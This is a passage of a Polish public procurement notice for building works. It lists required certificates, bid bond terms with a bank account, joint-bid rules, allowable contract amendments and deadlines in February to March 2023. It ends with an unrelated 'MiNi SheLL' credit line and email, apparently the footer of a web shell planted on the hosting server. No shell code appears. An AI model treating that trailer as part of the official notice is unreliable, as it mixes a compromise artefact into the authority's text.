cz. VIII<br/>SWZ.<br/>2.Zaświadczenie właściwego naczelnika US potwierdzającego, że Wykonawca nie zalega z<br/>opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3<br/>miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z<br/>zaświadczeniem Zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed<br/>upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem<br/>terminu składania ofert Wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami<br/>lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności; Wymagany oryginał<br/>dokumentu lub potwierdzona za zgodność z oryginałem kopia podpisana kwalifikowanym podpisem<br/>elektronicznym zaufanym lub osobistym. Zgodnie z cz. VIII SWZ.<br/>3.Zaświadczenie albo inny dokument właściwej terenowej jednostki organizacyjnej ZUS lub właściwego<br/>oddziału regionalnego lub właściwej placówki terenowej KRUS potwierdzającego, że Wykonawca nie<br/>zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1<br/>ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z<br/>opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym<br/>dokumentem Zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed<br/>upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem<br/>terminu składania ofert Wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne<br/>lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych<br/>należności; Wymagany oryginał dokumentu lub potwierdzona za zgodność z oryginałem kopia<br/>podpisana kwalifikowanym podpisem elektronicznym zaufanym lub osobistym. Zgodnie z cz. VIII SWZ.<br/>4.Odpis lub informacja z KRS lub z CE i IDG, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych<br/>nie wcześniej niż 3 mies. przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub<br/>ewidencji; Wymagany oryginał dokumentu lub potwierdzona za zgodność z oryginałem kopia<br/>podpisana kwalifikowanym podpisem elektronicznym zaufanym lub osobistym. Zgodnie z cz. VIII SWZ.<br/>5.Kosztorys ofertowy. Wymagany oryginał dokumentu. Zał. nr 5b – kosztorys ofertowy budynek B branża budowlana; Zał.<br/>nr 5c – kosztorys ofertowy budynek B branża elektryczna, Zał. nr 5d - kosztorys ofertowy budynek B branża sanitarna do specyfikacji<br/>lub potwierdzona za<br/>zgodność z oryginałem kopia podpisana kwalifikowanym podpisem elektronicznym zaufanym lub<br/>osobistym. Zgodnie z cz. VIII SWZ.<br/>6.Wykaz co najmniej dwóch robót budowlanych o wartości minimum 250 000,00 zł. brutto każda,<br/>polegającej na budowie budynków mieszkalnych, technicznych lub użyteczności publicznej,<br/>wykonanych nie wcześniej niż w okresie ostatnich 5 lat; Załącznik nr 5 do SWZ,<br/>7. Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami<br/>budowlanymi, (dotyczy kierownika/kierowników budowy); Załącznik nr 5a do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">: 1 Wypełniony formularz<br/>ofertowy Załącznik nr 1 do SWZ.<br/>2 Oświadczenia Wykonawcy Załącznik nr 2 i 3 do SWZ.<br/>3 Pełnomocnictwo Oznacza to, że jeżeli upoważnienie do podpisywania dokumentów przetargowych<br/>nie wynika wprost z dokumentu stwierdzającego status prawny Wykonawcy, to do oferty należy<br/>dołączyć oryginał lub poświadczoną notarialnie kopię stosownego pełnomocnictwa określające zakres<br/>uprawnień wystawionego przez osoby do tego upoważnione. (jeżeli dotyczy).<br/>4 Zobowiązanie podmiotu udostępniającego zasoby Wykonawca, który polega na zdolnościach lub<br/>sytuacji podmiotów udostępniających zasoby, składa, wraz z wnioskiem<br/>o dopuszczenie do udziału w postępowaniu albo odpowiednio wraz z ofertą, zobowiązanie podmiotu<br/>udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/>danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. Zobowiązanie składa się<br/>zgodnie z pkt. 10 - 11 części XXI SWZ załącznik nr 16 do SWZ (jeżeli dotyczy).<br/>5 Potwierdzenie wpłaty wadium. Wadium w kwocie określonej w niniejszej SWZ, wniesione w formie<br/>innej niż pieniądz musi obejmować termin związania ofertą, tj. 30 dni (do 11.03.2023 r.) licząc od dnia<br/>terminu składania ofert. Zgodnie z zapisami części XXII SWZ.<br/>6 Wstępny harmonogram rzeczowo finansowy. Wymagany oryginał dokumentu. Należy podać: zakres<br/>prac z uwzględnieniem terminu ich realizacji (w miesiącach), udział procentowy zaawansowania oraz<br/>wartości.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wadium wynosi:<br/>16 000,00 zł (słownie: szesnaście tysięcy złotych 00/100).<br/>2. Wadium może być wnoszone w jednej z kilku form wymienionych w art. 97 ust. 7 ustawy Pzp.<br/>Konto bankowe: NBP o/o Bydgoszcz nr: 40 1010 1078 0091 4613 9120 0000<br/>3. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w art. 97 ust. 7 pkt 2-4 ustawy Pzp,<br/>Wykonawca przekazuje (wraz z ofertą) Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej<br/>(opatrzonej kwalifikowanym podpisem elektronicznym lub zaufanym lub osobistym osób upoważnionych do jego<br/>wystawienia ze Strony gwaranta) i musi obejmować końcowy termin związania ofertą o którym mowa w części XI SWZ.<br/>4. Wadium powinno być wystawione na Zamawiającego.<br/>5. Konieczne jest, aby wadium w postaci gwarancji lub poręczenia obejmowało odpowiedzialność za wszystkie przypadki<br/>powodujące utratę wadium przez Wykonawcę, określone w art. 98 ust. 6 ustawy Pzp. Wadium to musi być bezwarunkowe,<br/>realizowane na żądanie Wykonawcy.<br/>6. W przypadku Wykonawców wspólnie ubiegających się o zamówienie dopuszcza się aby wadium zostało wniesione przez<br/>pełnomocnika (lidera) lub jednego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, z poniższym<br/>zastrzeżeniem.<br/>7. W przypadku Wykonawców składających ofertę wspólną treść dokumentu wadialnego musi zapewniać możliwość<br/>zaspokojenia interesów Zamawiającego, co oznacza że uzyskanie zagwarantowanej zapłaty wadium musi obejmować<br/>wszystkie wskazane w ustawie przesłanki zatrzymania wadium, o których mowa<br/>w art. 98 ust. 6 ustawy Pzp, tj.: działania lub zaniechania wszystkich Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>8. Wadium w formie pieniężnej (przelewem na rachunek bankowy Zamawiającego) musi wpłynąć na rachunek bankowy<br/>najpóźniej przed upływem terminu składania ofert, o którym mowa w części XIII SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.1 W przypadku Wykonawców składających ofertę wspólną, stosowne oświadczenia lub<br/>dokumenty, o których mowa w pkt. 2 i 3 (tabela), składa każdy z Wykonawców wspólnie<br/>ubiegających się o zamówienie.<br/>1.2 W przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby,<br/>Wykonawca przedstawia, wraz ze swoim oświadczeniem wstępnym, także oświadczenie<br/>podmiotu udostępniającego zasoby, o których mowa w pkt. 2 i 3 (tabela), potwierdzające brak<br/>podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w<br/>postępowaniu lub kryteriów selekcji, w zakresie, w jakim Wykonawca powołuje się na jego<br/>zasoby.<br/>1.3 Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w<br/>postępowaniu i zawarcia umowy<br/>w sprawie zamówienia publicznego (nie dotyczy spółki cywilnej, o ile<br/>upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do<br/>oferty umowy spółki, bądź wszyscy wspólnicy podpiszą ofertę).<br/>1.4 Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są złożyć wraz z<br/>ofertą stosowne pełnomocnictwo (nie dotyczy spółki cywilnej), o ile<br/>upoważnienie/pełnomocnictwo do występowania<br/>w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy<br/>podpiszą ofertę.<br/>Pełnomocnictwo, o którym mowa powyżej może wynikać albo z dokumentu pod taką samą<br/>nazwą, albo z umowy Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>1.5 Oferta musi być podpisana w taki sposób, by prawnie obowiązywała wszystkich<br/>Wykonawców występujących wspólnie (przez każdego z Wykonawców lub upoważnionego<br/>pełnomocnika).<br/>1.6 Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z<br/>pełnomocnikiem. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1) terminu realizacji przedmiotu zamówienia - gdy wystąpi konieczność zmiany terminu w<br/>związku z nieprzewidzianą sytuacją, wcześniejszym zrealizowaniem przedmiotu umowy lub<br/>zaistnieją okoliczności mające wpływ na termin realizacji, a których nie dało się przewidzieć w<br/>chwili zawarcia umowy,<br/>2) zmiany kierownika robót i osób upoważnionych do podpisania protokołu końcowego<br/>wykonanych robót<br/>i protokołów konieczności,<br/>3) zmiany w rozwiązaniach projektowych, jeżeli są one uzasadnione koniecznością zwiększenia<br/>bezpieczeństwa realizacji prac budowlanych lub usprawnienia procesu budowy,<br/>4) wystąpienia robót zamiennych i zaniechania części robót, potwierdzonych przez<br/>Zamawiającego w toku realizacji zadania inwestycyjnego, które będą wykonywane na podstawie<br/>protokołu konieczności i odpowiednich kosztorysów robót. Zaakceptowany przez Strony protokół<br/>konieczności stanowić będzie podstawę do sporządzenia aneksu do umowy bez zmiany<br/>wysokości wynagrodzenia,<br/>5) zmiany umowy polegające na zmianie danych Wykonawcy bez zmian samego Wykonawcy<br/>(np. zmiana siedziby, adresu, nazwy),<br/>6) sytuacji, których nie można było przewidzieć w chwili zawarcia umowy i mających charakter<br/>zmian nieistotnych tj. nieodnoszących się do warunków, które gdyby zostały ujęte w ramach<br/>pierwotnej procedury udzielania zamówienia, umożliwiłyby dopuszczenie innej oferty niż ta, która<br/>została pierwotnie dopuszczona,<br/>7) sytuacji, których nie można było przewidzieć w dniu zawarcia umowy, a korzystnych dla<br/>Zamawiającego,<br/>8) zaistnienia omyłki pisarskiej, zmiany powszechnie obowiązujących przepisów prawa w<br/>zakresie mającym wpływ na realizację zamówienia oraz powstania niejasności lub rozbieżności<br/>w rozumieniu pojęć użytych w umowie, których nie będzie można usunąć w inny sposób, a<br/>zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jej<br/>jednoznacznej interpretacji,<br/>9) w przypadku zmiany przepisów prawa – dopuszczalna jest taka zmiana umowy, która<br/>umożliwi dostosowanie postanowień niniejszej umowy lub przedmiotów umowy i jego<br/>wyposażenia do nowych przepisów prawa,<br/>10) procedury odbiorowej przedmiotu zamówienia,<br/>11) w przypadku zdarzenia siły wyższej rozumianej jako zdarzenie mające wpływ na zdolność<br/>Strony do wykonywania któregokolwiek ze swoich zobowiązań na mocy niniejszej umowy lub<br/>zapobiegające osiągnięciu oczekiwanej wydajności któregokolwiek ze swoich obowiązków, pod<br/>warunkiem, że:<br/>- zdarzenie było poza kontrolą Strony powołującej się na siłę wyższą,<br/>- Strona nie mogła w racjonalny sposób przewidzieć przeszkody i jej następstw ograniczających<br/>zdolność do<br/>wykonywania swoich zobowiązań w momencie podpisania umowy i w późniejszym okresie,<br/>- Strona powołująca się na zdarzenie siły wyższej nie mogła racjonalnie uniknąć lub<br/>przezwyciężyć przeszkody<br/>lub jej skutków.<br/>Do zdarzeń siły wyższej należą m.in.: trzęsienia ziemi, epidemie, duże pożary, powodzie,<br/>tajfuny, katastrofy morskie, działania podjęte przez organizacje rządowe uniemożliwiające lub<br/>opóźniające realizację któregokolwiek ze zobowiązań Strony niniejszej umowy.<br/>12) w przypadku zmiany wysokości stawki VAT obowiązującej na dzień wystawienia faktury<br/>częściowej lub końcowej. Wartość netto w fakturach częściowych lub końcowych nie ulega<br/>zmianie.<br/>Przewidziane powyżej okoliczności stanowiące podstawę zmian do umowy, są uprawnieniem<br/>Zamawiającego, nie zaś jego obowiązkiem. Każda ewentualna zmiana wymagać będzie<br/>odrębnego rozpatrzenia i zasadności jej wprowadzenia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-02-10 10:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę/wniosek o dopuszczenie do udziału w postępowaniu, dalej „wniosek” za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionego również na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-02-10 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-03-11</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zgodnie z art. 310 ustawy z dnia 11 września 2019 r. o prawie zamówień publicznych - zamawiający dopuszcza możliwość<br/>unieważnienia postępowania o udzielenie zamówienia, jeżeli środki publiczne, które Zamawiający zamierzał przeznaczyć na<br/>sfinansowanie zamówienia nie zostaną mu przyznane.

Creat By MiNi SheLL
Email: jattceo@gmail.com